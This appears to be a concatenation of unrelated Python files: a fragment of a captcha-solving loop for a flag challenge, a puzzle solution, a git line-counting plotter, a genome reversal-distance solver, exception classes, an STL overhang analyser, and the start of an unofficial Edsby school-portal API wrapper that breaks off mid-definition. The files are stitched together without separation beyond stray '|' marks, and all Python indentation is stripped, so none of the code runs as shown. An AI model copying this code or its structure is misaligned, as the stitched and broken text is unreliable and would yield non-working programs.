if not os.path.exists(TEMP_CAPTCHA):
os.makedirs(TEMP_CAPTCHA)
# create a requests session to make all requests (using the same session cookie)
requstSession = requests.Session()
requstSession.headers['User-Agent'] = 'Mozilla/5'
while True:
time.sleep(0.5)
# empy temp folder
clearFiles()
# get the first set of captchas for the start
response = requstSession.get(URL + "0")
extractCaptchas(response.content.decode("utf-8"))
# complete baby stage
asnwersS0 = getAllAnswers()
if(not sendAnswers(requstSession, 0, asnwersS0)): continue
# complete human stage
asnwersS1 = getAllAnswers()
if(not sendAnswers(requstSession, 1, asnwersS1)): continue
# complete tool assisted stage
asnwersS2 = getAllAnswers()
if(not sendAnswers(requstSession, 2, asnwersS2)): continue
# complete bot stage and get flag
asnwersS3 = getAllAnswers()
sendAnswers(requstSession, 3, asnwersS3)
if __name__ == "__main__":
main()
|
input_str = input()
i_and_moster = input_str.split(" ")
i_val = int(i_and_moster[0])
moster_num = i_and_moster[-1]
#print(i_val, moster_num)
input_str = input()
moster_list = input_str.split(" ")
#print(moster_list)
moster_list = [int(i) for i in moster_list]
moster_list.sort()
#print(moster_list)
money = 0
high_money = 0
for moster_val in range(len(moster_list)):
if i_val >= moster_list[moster_val]:
money += 1
if money>high_money:
high_money = money
else:
if i_val + money >= moster_list[moster_val]:
money -= moster_list[moster_val] - i_val
i_val = moster_list[moster_val]
money += 1
if money > high_money:
high_money = money
else:
break
print(high_money) |
import sys
import datetime
import glob
from matplotlib import pyplot as plt
import matplotlib.dates as md
from git import Repo
def count_lines(extensions):
results = []
for ext in extensions:
count = 0
files = glob.glob(path_to_repo + '/**/*' + ext, recursive=True)
for filename in files:
try:
with open(filename) as f:
for l in f:
if not l.isspace():
count += 1
except:
pass
results.append((ext,count))
return results
def plot_results(dates, results):
f, ax = plt.subplots(1, sharex='all', sharey='all')
xfmt = md.DateFormatter('%Y-%m-%d')
formatted_dates = [datetime.datetime.fromtimestamp(date) for date in dates]
for result in results:
ax.plot(formatted_dates, result)
ax.xaxis.set_major_formatter(xfmt)
f.autofmt_xdate()
plt.savefig("results.jpg")
plt.show()
def save_results(dates, results):
with open('results.txt', 'w') as f:
f.write(','.join([str(date) for date in dates]) + '\n')
for result in results:
f.write(','.join([str(count) for count in result]) + '\n')
#Path to repository should be the argument to script
print("Args: " + str(sys.argv))
#The script itself is the first argument, "full or increment is the second", the path is the next, and extensions is the last
type = sys.argv[1]
path_to_repo = sys.argv[2]
print('Repo: ' + path_to_repo)
extensions = [x.strip() for x in sys.argv[3].split(',')]
print('Extensions: ' + str(extensions))
repo = Repo(path_to_repo)
git = repo.git
git.checkout('master')
git.pull()
commits = list(repo.iter_commits())
if type == 'full':
max_interval_seconds = 3600 * 24 * 30
interval_seconds = 3600 * 24
date = None
filtered_commits = []
print("Filtered commit dates:")
results = [[] for ext in extensions]
dates = []
for commit in commits:
if date == None or commit.committed_date < (date - interval_seconds) or commits[-1] == commit:
date = commit.committed_date
#Increase interval between commits
interval_seconds = min(max_interval_seconds, interval_seconds * 2)
filtered_commits.append(commit)
git.checkout(commit.hexsha, force=True)
dates.append(date)
result = count_lines(extensions)
for i in range(len(result)):
results[i].append(result[i][1])
print(datetime.datetime.fromtimestamp(date).strftime('%Y-%m-%d %H:%M') + ': ' + str(result))
save_results(dates, results)
plot_results(dates, results)
elif type == 'increment':
with open('results.txt', 'r') as f:
lines = list(f)
dates = [int(s) for s in lines[0].split(',')]
results = [[int(s) for s in l.split(',')] for l in lines[1:]]
dates.insert(0,commits[0].committed_date)
current_count = count_lines(extensions)
for i in range(len(results)):
results[i].insert(0,current_count[i][1])
save_results(dates, results)
plot_results(dates, results)
else:
print("Unknown command: " + type + " Allowed commands: full, increment") |
import sys
import collections
def all_reversals(permutation):
""" Generator for all reversals of a permutation
:param permutation: the input permutation string
:return: each reversal of the permutation
"""
for i in range(len(permutation)):
for j in range(i + 2, len(permutation) + 1):
yield permutation[:i] + permutation[i:j][::-1] + permutation[j:], (i + 1, j)
def determine_reversals(p_init, p_target):
""" Sorting by reversals
:param p_init: the initial permutation string
:param p_target: the target permutation string
:return: the reversal distance (int) and the reversal endpoint indices (list of 2-tuples)
"""
# if the permutations are equal, the reversal distance is 0 with no reversals
if p_init == p_target:
return 0, ("", "")
# search forwards
q = collections.deque((p_init, ))
dist_init = {p_init: 0}
rev_hist_init = {p_init: []}
while q:
perm = q.popleft()
dist = dist_init[perm]
rev_hist = rev_hist_init[perm]
for (perm_new, rev) in all_reversals(perm):
if perm_new == p_target:
return dist + 1, rev_hist + [rev]
if perm_new not in dist_init:
dist_init[perm_new] = dist + 1
rev_hist_init[perm_new] = rev_hist + [rev]
if dist != 4:
q.append(perm_new)
# search backwards
q = collections.deque((p_target,))
dist_target = {p_target: 0}
rev_hist_target = {p_target: []}
final_dist = 1e6
while q:
perm = q.popleft()
dist = dist_target[perm]
rev_hist = rev_hist_target[perm]
for (perm_new, rev) in all_reversals(perm):
if perm_new not in dist_target:
dist_target[perm_new] = dist + 1
rev_hist_target[perm_new] = rev_hist + [rev]
if dist != 3:
q.append(perm_new)
if perm_new in dist_init:
if final_dist > dist_init[perm_new] + dist_target[perm_new]:
final_dist = dist_init[perm_new] + dist_target[perm_new]
final_rev_hist = rev_hist_init[perm_new] + rev_hist_target[perm_new][::-1]
return final_dist, final_rev_hist
if __name__ == "__main__":
'''
Given: Two permutations π and γ, each of length 10.
Return: The reversal distance drev(π,γ), followed by a collection of reversals sorting π into γ. If multiple collections of such reversals exist, you may return any one.
'''
input_lines = sys.stdin.read().splitlines()
perm1 = tuple([x for x in input_lines[0].split()])
perm2 = tuple([x for x in input_lines[1].split()])
(rev_distance, revs_list) = determine_reversals(perm1, perm2)
print(rev_distance)
for (x1, x2) in revs_list:
print(x1, x2)
|
import abc
class GameEngine(object, metaclass=abc.ABCMeta):
@abc.abstractmethod
def create_new_game(self):
"""
:return: an initial GameState object, representing the initial state of a game
"""
raise NotImplementedError()
|
# -*- coding: utf-8 -*-
import json
class AlbBaseException(Exception):
http_status_code = 200
def __init__(self, code, message=None, data=None):
self.code = code
self.message = message
self.data = data
self.tojson = self.__str__
def __str__(self):
return json.dumps({
'code': self.code,
'message': self.message,
'data': self.data,
})
class BadRequestException(AlbBaseException):
http_status_code = 400
def __init__(self, code=400, message=None, data=None):
super(BadRequestException, self).__init__(code, message, data)
class UnauthorizedException(AlbBaseException):
http_status_code = 401
def __init__(self, code=401, message=None, data=None):
super(UnauthorizedException, self).__init__(code, message, data)
class ForbiddenException(AlbBaseException):
http_status_code = 403
def __init__(self, code=403, message=None, data=None):
super(ForbiddenException, self).__init__(code, message, data)
class NotFoundException(AlbBaseException):
http_status_code = 404
def __init__(self, code=404, message=None, data=None):
super(NotFoundException, self).__init__(code, message, data)
if __name__ == '__main__':
print(AlbBaseException(200, "", ""))
print(NotFoundException())
|
import numpy as np
from geoalt_geometry.vertices import Vertex, VertexCollection
from geoalt_geometry.edges import Edge, EdgeCollection
from timeit import default_timer as timer
class FaceCollection:
'''
Collection of Face objects
'''
def __init__(self, stlfile):
self.stlfile = stlfile
self.faces = []
self.problem_faces = []
self.good_faces = []
self.vertex_collection = VertexCollection()
self.edge_collection = EdgeCollection()
self.iterator_pointer = 0
self.total_weight = 0
def append(self, face, ignore_edges=False):
'''
Add face to face collection
'''
if (isinstance(face, Face) is False):
raise TypeError('face argument needs to be of type Face()')
if face.has_bad_angle is True:
self.problem_faces.append(face)
else:
self.good_faces.append(face)
# This is where it is ensured using OOP that there only exists one instance of each unique vertex
face.vertices[0] = self.vertex_collection.add(face.vertices[0])
face.vertices[1] = self.vertex_collection.add(face.vertices[1])
face.vertices[2] = self.vertex_collection.add(face.vertices[2])
# Each unique vertex is marked as adjacent to the other vertices in the face.
face.vertices[0].set_adjacency(face.vertices[1])
face.vertices[0].set_adjacency(face.vertices[2])
face.vertices[1].set_adjacency(face.vertices[2])
self.faces.append(face)
if ignore_edges is not True:
face.set_edges(self.edge_collection)
return
def __iter__(self):
'''
Contributes to making this class iterable by providing an interface
'''
return self
def __next__(self):
'''
Contributes to making this class iterable by providing a pointer.
'''
if self.iterator_pointer > (len(self.faces) - 1):
self.iterator_pointer = 0
raise StopIteration
else:
self.iterator_pointer += 1
return self.faces[self.iterator_pointer - 1]
def get_warning_count(self):
'''
Returns the amount of potentially problematic faces
'''
return len(self.problem_faces)
def get_vertices(self, vtype="all"):
return_array = []
if vtype=="all":
for f in self.faces:
return_array.append(f.get_vertices_as_arrays())
elif vtype=="bad":
for f in self.problem_faces:
return_array.append(f.get_vertices_as_arrays())
elif vtype=="good":
for f in self.good_faces:
return_array.append(f.get_vertices_as_arrays())
return return_array
def get_vertex_collection(self):
return self.vertex_collection
def check_for_problems(self, phi_min=np.pi/4, ignore_grounded=False, ground_level=0, ground_tolerance=0.01, angle_tolerance=0.017):
self.total_weight = 0
self.good_faces = []
self.problem_faces = []
for f in self.faces:
f.refresh_normal_vector()
has_bad_angle = f.check_for_problems(phi_min=phi_min, ignore_grounded=ignore_grounded, ground_level=ground_level, ground_tolerance=ground_tolerance, angle_tolerance=angle_tolerance, no_weight_update=False)
if has_bad_angle is True:
self.problem_faces.append(f)
else:
self.good_faces.append(f)
class Face:
'''
STL polygon face
'''
def __init__(self, face_collection, normal_index, vertex_index):
'''
vert1, vert2, vert3: vertices of a polygon\n
n: normal vector\n
phi_min: minimum angular difference between normal vector and -z_hat before marked as a problematic surface
'''
self.face_collection = face_collection
self.normal_index = None
self.vertex_index = None
self.vertices = []
self.weight = 0
self.edge1 = None
self.edge2 = None
self.edge3 = None
self.n = None # The normal vector
self.n_hat = None # Normalized normal vector (unit vector)
self.n_hat_original = None # The original normalized normal vector from when the model was loaded the first time
self.has_bad_angle = None # True if this face has a problematic angle
self.angle = None # The angle compared to the xy-plane
self.grounded = False
self.vector1 = None
self.vector2 = None
def set_edges(self, edge_collection):
# SLOW:
self.edge1 = edge_collection.add(Edge(self.vertices[0], self.vertices[1]))
self.edge2 = edge_collection.add(Edge(self.vertices[1], self.vertices[2]))
self.edge3 = edge_collection.add(Edge(self.vertices[2], self.vertices[0]))
# FAST:
self.edge1.associate_with_face(self)
self.edge2.associate_with_face(self)
self.edge3.associate_with_face(self)
def __connect_vertices__(self):
'''
Connect all vertices to each other
'''
self.vertices[0].set_adjacency(self.vertices[1])
self.vertices[0].set_adjacency(self.vertices[2])
self.vertices[1].set_adjacency(self.vertices[2])
def get_top_z(self):
z_array = np.array(self.get_vertices_as_arrays())[:,2]
return z_array[np.argsort(z_array)[2]]
def refresh_normal_vector(self):
self.vector1 = self.vertices[1].get_array() - self.vertices[0].get_array()
self.vector2 = self.vertices[2].get_array() - self.vertices[0].get_array()
self.n = np.cross(self.vector1, self.vector2)
self.n_hat = self.n/np.linalg.norm(self.n)
return self.n_hat
def check_for_problems(self, phi_min=np.pi/4, ignore_grounded=False, ground_level=0, ground_tolerance = 0.01, angle_tolerance = 0.017, no_weight_update=True):
'''
phi_min: Min angle before problem, in rads.\n
ignore_grounded: Ignore surfaces close to the floor (prone to visual buggs in python)\n
ground_level: The z-index of the ground\n
ground_tolerance: How close a vertex needs to be to the ground in order to be considered as touching it.\n
angle_tolerance: How close to the phi_min an angle needs to be in order to be considered as acceptable.
Setting this to 0 causes the problem correction process to take much more time.\n
'''
# Check the angle of the normal factor, and compare it to that of the inverted z-unit vector
neg_z_hat = [0,0,-1]
angle = np.arccos(np.clip(np.dot(self.n_hat, neg_z_hat), -1.0, 1.0))
self.angle = angle
self.grounded = False
return_value = None
# Check if angle is within problem threshold
if angle >= 0 and angle < phi_min:
self.grounded = self.check_grounded(ground_level, ground_tolerance)
if self.grounded is True and ignore_grounded is False: # Check if grounded
self.has_bad_angle = False
return_value = False
elif (angle - phi_min)**2 < angle_tolerance**2: # Check if inside tolerence
self.has_bad_angle = False
return_value = False
else:
# If the angle is bad, and it is not on the ground, and is outside of tolerances, then mark it as a bad angle.
self.has_bad_angle = True
return_value = True
else:
# The angle is outside of the problem threshold and should thus be marked as an accepted angle.
self.has_bad_angle = False
return_value = False
# Calculate weight
self.calculate_weight(phi_min=phi_min, no_update=no_weight_update)
return return_value
def calculate_weight(self, phi_min = np.pi/4, no_update=True):
# Calculate area of projection onto XY plane
cross = np.cross([self.vector1[0], self.vector1[1], 0], [self.vector2[0], self.vector2[1], 0])
area = np.linalg.norm(cross)/2
# Calculate constants:
m_heavy = 63.74
k_heavy = 42.96
m_light = 21.23
k_light = 14.3
weightPerArea = 0
if self.angle < 0.087:
# 5 degrees or less: Considered as flat overhang.
if self.grounded is False:
weightPerArea = 100
else:
weightPerArea = -80 # Discount for flat surfaces touching the ground. Easier to remove from substrate.
self.face_collection.stlfile.grounded = True # Mark this orientation as grounded.
elif self.angle < phi_min:
weightPerArea = 63.74 - self.angle * 42.96 # Linear proportion. 1 deg overhang = 60 weight per area, 30 deg overhang = 30 weight per area
elif phi_min < self.angle and self.angle < (np.pi/2 - 0.087):
weightPerArea = 21.23 - self.angle * 14.3 # Linear proportion. 45 deg overhang = 10 wpa, 89 deg overhang = 0 wpa
weight = weightPerArea * area
if no_update is False:
self.weight = weight
self.face_collection.total_weight += weight
return weight
def get_vertices_as_arrays(self):
return np.array([self.vertices[0].get_array(), self.vertices[1].get_array(), self.vertices[2].get_array()])
def get_vertices(self):
return [self.vertices[0], self.vertices[1], self.vertices[2]]
def get_edges(self):
return [self.edge1, self.edge2, self.edge3]
def __lt__(self, other):
if self.top_z > other.top_z:
return True
else:
return False
def check_grounded(self, ground_level, ground_tolerance):
'''
Check if this surface is parallel to the ground.
'''
# Calculate differences between individual vertex Z-elements, and the ground level.
diff_1 = np.abs(self.vertices[0].get_array()[2] - ground_level)
diff_2 = np.abs(self.vertices[1].get_array()[2] - ground_level)
diff_3 = np.abs(self.vertices[2].get_array()[2] - ground_level)
# If any of the ground levels is above the threshold, then return false, else return true.
if diff_1 > ground_tolerance or diff_2 > ground_tolerance or diff_3 > ground_tolerance:
return False
return True
def calculate_normal_vector(self):
n = np.cross((self.vertices[1].get_array() - self.vertices[0].get_array()),(self.vertices[2].get_array() - self.vertices[1].get_array()))
return n/np.linalg.norm(n)
def __eq__(self, other):
if self.vertices[0] not in other.get_vertices():
return False
if self.vertices[1] not in other.get_vertices():
return False
if self.vertices[2] not in other.get_vertices():
return False
return True |
import requests, json
from past.builtins import basestring
from copy import deepcopy
from datetime import date
"""
Edsby.py: An API wrapper/library for Python - v0.7.1
https://github.com/ctrezevant/PyEdsby/
(c) 2017 Charlton Trezevant - www.ctis.me
MIT License
This code is well documented. You can find supplementary
documentation, as well as the documentation included here
in the PyEdsby wiki: https://github.com/ctrezevant/PyEdsby/wiki
The Edsby trademark and brand are property of CoreFour, Inc.
This software is unofficial and not supported by CoreFour in any way.
"""
class Edsby(object):
def __init__(self, **kwargs):
self.edsbyHost = kwargs['host']
if 'headers' in kwargs:
self.globalHeaders = kwargs['headers']
else:
self.globalHeaders = {
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0 Safari/601.1',
'referer': 'https://'+self.edsbyHost+'/',
'accept': '*/*',
'accept-language':'en-US,en',
'dnt': '1',
'x-requested-with':'XMLHttpRequest'
}
# You can also pass instance metadata, if you want to create PyEdsby instances a little faster.
# All the class really needs is a dict with the nid property set, so you can pass something like
# {'nid': 'your nid'} and not break anything.
if 'meta' in kwargs:
self.instanceMeta = kwargs['meta']
else:
self.instanceMeta = self.parseInstanceMetadata()
# You can pass a Session instance you've already made to PyEdsby, if you don't want it to create its own.
# Note that we only use sessions to keep track of cookies, so if you also want to use custom headers make sure
# that you pass those in.
if 'session' in kwargs:
self.session = kwargs['session']
else:
self.session = self.getSession()
# You can also pass the constructor your credentials, if you'd rather not call the login method.
if 'username' in kwargs and 'password' in kwargs:
self.login(username=kwargs['username'], password=kwargs['password'])
"""
Authenticates the session and retrieves instance and student metadata
"""
def login(self, **kwargs):
self.authData = self.getauthData((kwargs['username'], kwargs['password']))
self.studentData = self.sendAuthenticationData()
return True
"""
Overwrites the session and clears all authentication keys/student metadata,
which deauthenticates your session (effectively logging you out).
"""
def logout(self):
self.endSession()
self.clearStudentData()
return True
"""
Allows headers to be changed after instantiation (for imitating a mobile device, for example)
"""
def setHeaders(self, headers):
self.globalHeaders = headers
"""
Returns the HTTP headers currently in use for all API calls
"""
def getHeaders(self):
return self.globalHeaders
"""
Allows cookies to be manually set or modified (initially set automatically by
the getSession method)
You can either pass a dict or a cookiejar. If you pass a dict, then the method will automatically
convert it into the cookiejar format.
"""
def setCookies(self, cookies):
if isinstance(cookies, dict):
cookies = requests.utils.cookiejar_from_dict(cookies)
self.session.cookies = cookies
"""
Allows retrieval of cookies currently in use for all API calls
"""
def getCookies(self):
return self.session.cookies.get_dict()
"""
May be used to retrieve student metadata (nid, unid, name, and so on)
"""
def getStudentData(self):
return self.studentData
"""
This method overwrites all internally held student data.
"""
def clearStudentData(self):
self.authData = None
self.studentData = None
return True
"""
Can be used to modify the internally held student metadata
"""
def setStudentData(self, studentData):
self.studentData = studentData
"""
This begins a session, retrieving cookies that we'll use later. Don't call this if you've already called
login, as it will overwrite the cookies.
"""
def getSession(self):
return requests.Session().get('https://'+self.edsbyHost+"/core/login/"+str(self.instanceMeta['nid'])+"?xds=loginform&editable=true",headers=self.getHeaders())
"""
This method overwrites the current session, which effectively logs the user out.
"""
def endSession(self):
self.session = self.getSession()
"""
Scrapes the InstanceMeta dict from your Edsby instance.
"""
def parseInstanceMetadata(self):
rawPage = requests.get('https://'+self.edsbyHost,headers=self.getHeaders()).text
meta = rawPage[rawPage.find('openSesame(')+12:] # Cut out all parts of webpage before openSesame call.
meta = meta[:meta.find('}')].split(',') # cut out everything after the openSesame call that isn't a part of the metadata we want
# Metadata's now a string, but we aren't ready to return it just yet. We need to convert it from an array of
# conjoined key:value pairs (e.g. "base:'BasePublic'") into a format we can use.
metaTuples = list()
for prop in meta: # for every entry in our array of conjoined k:vs:
key = prop[0:prop.find(":")].strip() # Cut only the property out ([base]:'BasePublic')
key = key.replace('"',"")
value = prop[len(key)+3:].replace("'", "") # Cut out the value (base:['BasePublic']), remove leftover 's
metaTuples.append((key, value)) # Build our array of (key, value) tuples
# Convert the tuple array into a dict, and return it.
# For more on the theory behind this, have a look at https://docs.python.org/2/tutorial/datastructures.html#tut-listcomps
return dict(metaTuples)
"""
Returns a dict of useful metadata about your Edsby instance.
This is required, as we'll need the instance NID to authenticate the user.
{
nid: instance NID,
uid: instance NID,
version: 17431,
base: 'BasePublic',
compiled: 1492092324,
app: 'us2',
system: 'us2'
}
"""
def getInstanceMetadata(self):
return self.instanceMeta
"""
Retrieves a variety of authentication data from Edsby (server nonces, keys, etc)
Which are then used by sendAuthenticationData to complete user authentication.
"""
def getauthData(self, loginData):
self.authData = requests.get('https://'+self.edsbyHost+"/core/node.json/"+str(self.instanceMeta['nid'])+"?xds=fetchcryptdata&type=Plaintext-LeapLDAP",cookies=self.getCookies(),headers=self.getHeaders()).json()["slices"][0]
return {
'_formkey': self.authData["_formkey"],
'sauthdata': self.authData['data']["sauthdata"],
'crypttype': 'LeapLDAP',
'login-userid': loginData[0],
'login-password': loginData[1],
'login-host': self.edsbyHost,
'remember': 1
}
"""
This is the final step in the authentication process, which completes user login and returns
student metadata returned by Edsby
"""
def sendAuthenticationData(self):
studentData = requests.post('https://'+self.edsbyHost+'/core/login/'+str(self.instanceMeta['nid'])+'?xds=loginform&editable=true',data=self.authData,cookies=self.getCookies(),headers=self.getHeaders())
cookies = {
'session_id_edsby': dict(studentData.cookies)['session_id_edsby'],
}
self.setCookies(cookies)
studentData = studentData.json()
if 'error' in studentData:
raise LoginError(studentData['errorstr'])
return {
'unid': studentData['unid'],
'compiled': studentData['compiled'],
'nid': studentData['slices'][0]['nid'],
'name': studentData['slices'][0]['data']['name'],
'guid': studentData['slices'][0]['data']['guid'],
'formkey': studentData['slices'][0]['data']['formkey']
}
"""
In a browser, this API call would bootstrap the web app. Here, however, we need only
call it update our session state from Edsby's point of view. This has a lot of UI related metadata,
though I haven't explored it in detail.
"""
def getBootstrapData(self):
return requests.get('https://'+self.edsbyHost+'/core/node.json/?xds=bootstrap',cookies=self.getCookies(),headers=self.getHeaders()).json()
"""
This returns a wealth of metadata about the student as a whole,
including classes. This is yet another thing I haven't explored in great detail.
"""
def getBaseStudentData(self):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(self.studentData['unid'])+'?xds=BaseStudent',cookies=self.getCookies(),headers=self.getHeaders()).json()
"""
Returns personal information about the student, including their full name,
phone number, address, and registered parents.
"""
def getStudentPersonalInfo(self):
personalInfo = requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(self.studentData['unid'])+'?xds=editPersonalInformation',cookies=self.getCookies(),headers=self.getHeaders()).json()["slices"][0]
return personalInfo['data'] if 'data' in personalInfo else ''
"""
Returns the currently active account settings for the user.
"""
def getAccountSettings(self):
userSettings = requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(self.studentData['unid'])+'?xds=editSettings',cookies=self.getCookies(),headers=self.getHeaders()).json()["slices"][0]
return userSettings['data'] if 'data' in userSettings else ''
"""
Returns raw class data for only the current set of enrolled classes, which looks like:
"r<class RID>": {
"nodetype": 3,
"reltype": 4,
"parentsAllowed": 3,
"nid": <class NID>,
"nodesubtype": 2,
"teacherNid": <teacher NID>,
"fraction": "3/8",
"rid": <class RID>,
"class": {
"data": {
"ShowAverage": "0"
},
"details": {
"info": {
"code": "<school course code>",
"teachernid": <teacher NID>,
"param": "<teacher Name>"
},
"course": "<human readable course name>",
"new": {
"messages": 0,
"results": 0
}
},
"ShowAverage": "0"
},
"studentLock": 2
},
"""
def getRawCurrentClassData(self):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(self.studentData['nid'])+'?xds=BaseStudentClasses&match=multi',cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']['classesContainer']['classes']
"""
Returns a parsed list of only the classes you're currently enrolled in.
The dict returned appears like so:
"<class NID>": {
"human_name": "<human readable class name>",
"rid": <class RID>,
"course_code": <course code>,
"teacher": {
"name": "<teacher name>",
"nid": '<teacher NID>'
}
"""
def getCurrentClasses(self):
rawCurrentClasses = self.getRawCurrentClassData()
currentClasses = dict()
for className in rawCurrentClasses:
NID = rawCurrentClasses[className]['nid']
humanName = rawCurrentClasses[className]['class']['details']['course']
RID = rawCurrentClasses[className]['rid']
courseCode = rawCurrentClasses[className]['class']['details']['info']['teachernid']
currentClasses[NID] = dict()
currentClasses[NID]['human_name'] = humanName
currentClasses[NID]['rid'] = RID
currentClasses[NID]['course_code'] = courseCode
teacherName = rawCurrentClasses[className]['class']['details']['info']['param']
teacherNID = rawCurrentClasses[className]['class']['details']['info']['teachernid']
currentClasses[NID]['teacher'] = dict()
currentClasses[NID]['teacher']['name'] = teacherName
currentClasses[NID]['teacher']['nid'] = teacherNID
return currentClasses
"""
Returns a list of NIDs for the classes you are currently enrolled in.
"""
def getCurrentClassNIDList(self):
classNIDs = list()
for NID in self.getCurrentClasses():
classNIDs.append(NID)
return classNIDs
"""
Returns raw class data for the current and historical set of classes you're enrolled in, which looks like:
"r<course RID>": {
"nodetype": 3,
"Title": "<human readable name>",
"reltype": 12,
"value": someValue,
"nodesubtype": 2,
"course": {
"class": {
"text": {
"line2": {
"code": "<course code>",
"name": "<teacher name>"
},
"line1": "<human readable name>"
}
},
"basic": {
"text": {
"line1": "<course code>"
}
}
},
"nid": <course NID>,
"rid": <course RID>
}
"""
def getRawClassData(self):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(self.studentData['nid'])+'?xds=ClassPicker&match=multi',cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']['classes']
"""
Returns a parsed list of all available classes, both current and previous.
The dict returned appears like so:
"<class NID>": {
"human_name": "<human readable class name>",
"rid": <class RID>,
"course_code": <course code>,
"teacher": {
"name": "<teacher name>",
"nid": '<will always be None when using this method (see below)>'
}
"""
def getAllClasses(self):
rawClassData = requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(self.studentData['nid'])+'?xds=ClassPicker&match=multi',cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']['classes']
classDict = dict()
for className in rawClassData:
NID = rawClassData[className]['nid']
humanName = rawClassData[className]['course']['class']['text']['line1']
RID = rawClassData[className]['rid']
courseCode = rawClassData[className]['course']['class']['text']['line2']['code']
classDict[NID] = dict()
classDict[NID]['human_name'] = humanName
classDict[NID]['rid'] = RID
classDict[NID]['course_code'] = courseCode
classDict[NID]['teacher'] = dict()
classDict[NID]['teacher']['name'] = rawClassData[className]['course']['class']['text']['line2']['name']
# This endpoint does not return NID information for teachers, so we'll set this to None (e.g. null). If you need to
# Retrieve this data, try using the lookUpMessageRecipient method, or alternatively call getCurrentClasses.
classDict[NID]['teacher']['nid'] = None
return classDict
"""
getClassIDList has been renamed to getAllClasses. This shim provides backwards compatibility
for an otherwise breaking change.
"""
def getClassIDList(self):
return self.getAllClasses()
"""
Returns a list of NIDs for all available classes, both current and previous.
"""
def getAllClassNIDList(self):
classNIDs = list()
for NID in self.getAllClasses():
classNIDs.append(NID)
return classNIDs
"""
Retrieves the list of all classes you've historically been enrolled in, and
removes all the classes that you're currently enrolled in.
"""
def getPastClasses(self):
currentClasses = self.getCurrentClassNIDList()
allClasses = self.getAllClasses()
for classNID in list(allClasses):
if classNID in currentClasses:
del allClasses[classNID]
return allClasses
"""
Returns a list of NIDs for the classes you were previously enrolled in.
"""
def getPastClassNIDList(self):
classNIDs = list()
for NID in self.getPastClasses():
classNIDs.append(NID)
return classNIDs
"""
Returns your current average for the given class NID (e.g. 97.4)
"""
def getClassAverage(self, classNID):
classData = requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(classNID)+'?xds=MyWork&student='+str(self.studentData['unid']),cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']
if 'loaddata' in classData and 'average' in classData['loaddata']:
return classData['loaddata']['average']
else:
return ''
"""
Retrieves all available averages for the classes you're currently enrolled in.
Adds a new property, 'average', to the class dicts returned by the getCurrentClasses() method.
"""
def getCurrentClassAverages(self):
classes = self.getCurrentClasses()
for key in classes:
classes[key]['average'] = self.getClassAverage(key)
return classes
"""
Retrieves all available averages for the classes you're currently enrolled in.
Adds a new property, 'average', to the class dicts returned by the getAllClasses() method.
"""
def getAllClassAverages(self):
classes = self.getAllClasses()
for key in classes:
classes[key]['average'] = self.getClassAverage(key)
return classes
"""
Returns an object containing all assignment metadata for a specified course, ordered by RID
This includes the NID, RID, and weighting (points possible) of the assignments, but not your score.
"""
def getClassAssignmentMetadata(self, classNID):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(classNID)+'?xds=MyWork&student='+str(self.studentData['unid']),cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']['loaddata']['gradebook']['terms']
"""
Returns an object containing all assignment scores for a specified course, ordered by NID
This includes the NID and points earned on the assignment, but nothing else.
"""
def getClassAssignmentScores(self, classNID, classRID):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(classNID)+'/'+str(classRID)+'/'+str(classNID)+'?xds=MyWorkAssessmentPane&unit=all&student='+str(self.studentData['unid'])+'&model=24605449',cookies=self.getCookies(),headers=self.getHeaders()).json()["slices"][0]["data"]['grades']
"""
Returns an object containing all assignment scores for a specified course, ordered by NID
This includes the NID and points earned on the assignment, but nothing else.
This is different from getClassAssignmentScores in that it does not return all scores, and does so in a mixed
format where score might be a letter grade, or it could be a JSON string that we have to parse into a string
before reading. getClassAssignmentList can handle and process data returned from both of these endpoints
"""
def getMixedFormatClassAssignmentScores(self, classNID, classRID):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(classNID)+'/'+str(classRID)+'/'+str(classNID)+'?xds=MyWorkChart&student='+str(self.studentData['unid']),cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']['loaddata']['grades']
"""
Returns an array of NIDs for assignments that have been published (e.g. are visible) for a
given course
"""
def getClassPublishedAssignments(self, classNID, classRID):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(classNID)+'/'+str(classRID)+'/'+str(classNID)+'?xds=MyWorkChart&student='+str(self.studentData['unid']),cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']['bubbles']['publishedAssessments'].split(',')
"""
Gathers all available, published assignment data from a specified class, and computes scores for each. Returns an object
with all available data about the assignments (including a computed percentage), ordered by NID.
"<NID>": {
"sdate": "<guess: share date(?)>",
"graded": <1 or 0, whether assignment was graded>,
"weighting": <maximum possible points for assignment or something that makes no sense>,
"rid": <assignment RID>,
"state": "0", <- dunno what this is for
"score": <number of points earned on an assignment>,
"noavg": false, <whether or not the score was averaged?>
"scheme": "gs_outof", <maybe if assignments are points possible/max score?>
"type": "0", <- dunno what this is for
"columns": <maximum possible points for assignment float or dict for multi-part assignment>
"fraction": "number/1", <- dunno what this is for. number looks like an NID(?)
"summative": "1", <- dunno what this is for
"nid": <assignment NID>,
"cdate": "<guess: created date(?)>",
"date": "<guess: date grade was entered(?)>",
"esubmit": <0 or 1, guess: whether assignment was electronically submitted(?)>,
"nodetype": 6, <- dunno what this is for
"name": "<human name>",
"thread": <same as NID>,
"nodesubtype": 3, <- dunno what this is for
"scorePercentage": <computed score percentage>,
"published": "<1 or 0: true or false if assignment was published>"
}
"""
def getClassAssignmentList(self, classNID, classRID):
scores = self.getClassAssignmentScores(classNID, classRID) # Fetch assignment scores
metadata = self.getClassAssignmentMetadata(classNID) # Fetch assignment metadata
assignmentData = {
'assignments': dict(), # Assignments that have all applicable metadata present
